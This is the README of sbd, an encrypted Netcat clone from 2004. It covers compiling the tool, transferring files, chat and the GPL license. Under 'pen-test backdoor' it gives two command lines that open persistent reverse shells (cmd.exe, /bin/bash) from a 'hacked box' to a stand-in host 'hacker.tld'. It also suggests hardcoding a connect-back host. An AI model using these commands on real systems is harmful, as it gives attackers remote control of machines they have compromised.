.d8888. d8888b. d8888b.
88' YP 88 `8D 88 `8D
`8bo. 88oooY' 88 88
`Y8b. 88~~~b. 88 88
db 8D 88 8D 88 .8D
`8888Y' Y8888P' Y8888D'
Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
sbd is distributed under the GNU GPL
SYNOPSIS
sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), arbitrary command execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License.
COMPILATION
To compile sbd under a Unix-like operating system you need gcc and relevant development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others), type:
$ make unix
For SunOS/Solaris, type:
$ make sunos
To compile sbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or Cygwin with full development support (Cygwin's MinGW gcc). To compile a native Win32 sbd console application under Cygwin, type:
$ make win32
or, under MSYS:
$ make mingw
To compile a no-console ("WinMain") application under Cygwin, type:
$ make win32bg
or, under MSYS:
$ make mingwbg
To compile a Cygwin-specific console application, type:
$ make cygwin
You may want to change the default behaviour of sbd. One of the most important thing is to change the default shared secret to your own pass phrase. Edit sbd.h and replace with your preferences. You may, for example, want to hardcode a host + port to connect to if sbd is started without options. Complete examples are provided in sbd.h.
SAMPLE USES
With a little imagination, sbd can be used for many things...
- Use sbd to securely transfer files between two networks:
snafu$ sbd -l -p 12345 -k secret > output.file
fubar$ cat input.file | sbd -k secret snafu 12345
or from win32:
C:\somedir>type input.fil | sbd -k secret snafu 12345
- Use sbd as a simple (but secure) chat:
snafu$ sbd -P snafu -Hon fubar 1234
fubar$ sbd -Pfubar -Hon -l -p 1234
- Use sbd as a pen-test backdoor:
C:\hacked box>sbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443
or under Unix-like OSes:
root@owned# ./sbd -r1800 -Don -e /bin/bash hacker.tld 993
LICENSE
sbd Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
See the COPYING file for more information.
--
sbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe Devine <devine@cr0.net> and is distributed under the GNU General Public License (GPL).
Some code (for doexec_win32.h) has been derived from doexec.c from the Win32 port of Netcat (C) Weld Pond and hobbit. Parts of doexec.c is Copyright (C) 1994 Nathaniel W. Mishkin (doexec.c code was originally derived from rlogind.exe).
The original version of Netcat was written by hobbit <hobbit@avian.org>. The NT version was done by Weld Pond <weld@l0pht.com>.
--
Michel Blomgren <michel@cycom.se>
Information Security Consultant
Cycom AB
http://www.cycom.se/